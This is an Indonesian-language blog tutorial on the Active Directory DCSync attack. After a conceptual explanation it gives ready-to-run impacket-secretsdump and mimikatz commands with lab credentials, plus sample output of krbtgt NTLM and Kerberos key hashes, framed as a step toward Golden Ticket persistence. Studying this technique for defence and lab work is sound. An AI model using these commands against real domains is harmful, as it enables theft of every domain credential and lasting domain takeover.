Beranda / Active Directory Attack / Credential Dumping

Active Directory Credential Dumping: DCSync Attack

Diposting oleh Problem Child Posting Komentar

Active Directory Credential Dumping: DCSync Attack. Kali ini kita akan membahas DCSync, salah satu teknik credentials dumping ketika kita berhasil melakukan compromise domain user dengan hak akses istimewa seperti Domain Admin, Enterprise Admin, DC Administrators, dll.

Serangan ini sebenarnya mirip seperti credentials dumping pada umumnya (seperti dump SAM ataupun LSA). Hanya saja yang sebenarnya terjadi sedikit berbeda. DCSync dilakukan dengan menargetkan Domain Controller. Attacker yang memiliki hak akses DS-Replication-Get-Changes dan DS-Replication-Get-Changes-All bertindak seolah-olah sebagai Domain Controller dan mengirim permintaan ke DRSUAPI (Directory Replication Service API) untuk mereplikasi data termasuk kredensial domain user.

Tujuan akhir dari serangan ini biasanya adalah untuk mengambil hash dari krbtgt, yang nantinya bisa digunakan untuk melakukan crafting ticket.

Note: Meskipun secara default yang memiliki privilege DCsync hanya Domain Admin dan grup tinggi lainnya, penerapan hak akses yang salah dapat membuat user diluar grup tersebut memiliki privilege untuk melakukan DCSync.

DCSync Attack

Ada dua cara untuk melakukan DCSync attack, yakni melalui eksekusi di jaringan memanfaatkan impacket-secretsdump dan melalui Mimikatz. Jika menggunakan impacket-secretsdump maka commandnya adalah:

impacket-secretsdump 'evasvc':'Serviceworks1'@evangelion.lab -just-dc

Sesuaikan sendiri untuk username, password, dan juga target domainnya.

Atau jika tujuan DCSync ini adalah untuk generate Golden Ticket, maka kita cukup dump hash dari user krbtgt saja.

impacket-secretsdump 'evasvc':'Serviceworks1'@evangelion.lab -just-dc-user krbtgt

Atau jika menggunakan mimikatz, tinggal jalankan perintah:

lsadump::dcsync /user:krbtgt

mimikatz # lsadump::dcsync /user:krbtgt
[DC] 'EVANGELION.lab' will be the domain
[DC] 'EVANGELION-PC.EVANGELION.lab' will be the DC server
[DC] 'krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 2/11/2024 10:23:24 AM
Object Security ID   : S-1-5-21-922206919-2725117373-1955617319-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 03cbacc2724a06c820bbe54d9b0cf20d
    ntlm- 0: 03cbacc2724a06c820bbe54d9b0cf20d
    lm  - 0: 0798206e5bdb2c2af30c4a4ced14518c

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 523127ba43a228b7a770343129a1cdc6

* Primary:Kerberos-Newer-Keys *
    Default Salt : EVANGELION.LABkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 44da586489fee5d59df92aa0cd288ee669ea339f0c26214588710286d3edaca1
      aes128_hmac       (4096) : aa0be489f4962bc1cd1be9506db3e639
      des_cbc_md5       (4096) : 3104b9f1ae614567

What's next? Setelah mendapatkan hash NTLM dari krbtgt, selanjutnya kita bisa melakukan domain persistence menggunakan Golden Ticket. Akan kita bahas di next article.

Oke mungkin sekian sharing singkat kali ini, semoga bermanfaat.

Posting Komentar untuk "Active Directory Credential Dumping: DCSync Attack"

Posting Komentar

Silahkan tinggalkan komentar jika ada masukan, pertanyaan, kritik ataupun dukungan. Namun pastikan untuk berkomentar secara sopan.